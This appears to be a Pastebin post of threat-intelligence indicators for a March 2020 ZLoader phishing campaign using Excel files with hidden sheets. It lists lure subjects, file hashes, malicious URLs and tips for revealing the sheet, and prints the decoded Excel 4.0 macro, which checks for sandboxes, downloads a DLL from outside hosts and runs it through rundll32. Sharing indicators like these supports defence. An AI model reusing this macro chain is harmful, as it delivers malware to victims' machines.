ExecuteMalware

2020-03-27 ZLoader IOCs

Mar 27th, 2020
4,586
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.25 KB | None | 0 0
  1. SENDERS
  2.  
  3. SUBJECTS
  4. Second claim for debt
  5. Undelivered fax documents
  6. Unsent fax receipt's
  7. Your Reminder for Invoice - Honey man
  8.  
  9. ANALYSIS LINKS
  10. https://www.virustotal.com/gui/url/c5bb6572b39cf7700ad78a16f41961428da3ceefd6ae6c4fe57f3119bab6e820/detection
  11. https://www.virustotal.com/gui/url/3224d47bcf9287e8c0e7959a5c5a6c2d9c06762a5df1cf59150af41a505646a7/detection
  12. https://twitter.com/DynamicAnalysis/status/1243613560170823681
  13.  
  14. OVERVIEW
  15. Four Excel spreadhseets - all with a "VeryHidden" worksheet.
  16. LibreOffice can find and reveal these.
  17.  
  18. Open file in LibreOffice
  19. Right click the "Sheet1" tab and select "Show Sheet".
  20. A box pops up with the hidden sheet - select it and press OK
  21.  
  22. The other nice thing about using LibreOffice is that the =char() information is all converted so you can see the commands.
  23. I copied each column of Char codes into Sublime and removed the \n to pull everything up to a single horizontal line.
  24.  
  25. The macros are all the same:
  26.  
  27. =IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)
  28. =IF(GET.WORKSPACE(14)<381, CLOSE(FALSE),)
  29. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  30. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  31. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  32. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cdncloudtech.xyz/bag4hy","c:\Users\Public\cogp5yf.html",0,0)
  33. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://waitupdate.xyz/deg34g","c:\Users\Public\cogp5yf.html",0,0),)
  34. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  35. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\cogp5yf.html,DllRegisterServer",0,5)
  36. =CLOSE(FALSE)
  37.  
  38.  
  39. IOCs
  40. ==========================
  41. https://cdncloudtech.xyz/bag4hy
  42. http://waitupdate.xyz/deg34g
  43.  
  44. report-218.xls
  45. cb6ae0be54a2ef0a07aebebd4c7935f7
  46.  
  47. Case_inf_23577.xls
  48. db3c4de218a06a568ca05bd0f0064416
  49.  
  50. claim.062842.xls
  51. ff555143306c208de55b312e42d82118
  52.  
  53. Incoming.Invoice_48898.xls
  54. 5937e2decff47874577249235f98769f
  55.  
  56.  
  57. First download from: https://cdncloudtech.xyz/bag4hy
  58. calc.dll
  59. 62cb6a2a517351472698f669a845f91c
  60.  
  61. Second download is no longer available: https://waitupdate.xyz/deg34g
  62. Returns 503
Advertisement
Add Comment
Please, Sign In to add comment